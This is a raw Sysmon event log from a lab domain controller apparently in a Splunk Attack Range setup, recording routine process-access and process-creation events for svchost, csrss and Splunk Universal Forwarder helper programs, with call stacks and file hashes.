14:09:48.092{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.091{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.091{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-96AC-6005-8505-00000000A301}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.091{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96AC-6005-8505-00000000A301}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:48.090{59A5CD1D-96AC-6005-8505-00000000A301}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-96AD-6005-8705-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-96AD-6005-8705-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-96AD-6005-8705-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:49.480{59A5CD1D-96AD-6005-8705-00000000A301}4688C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 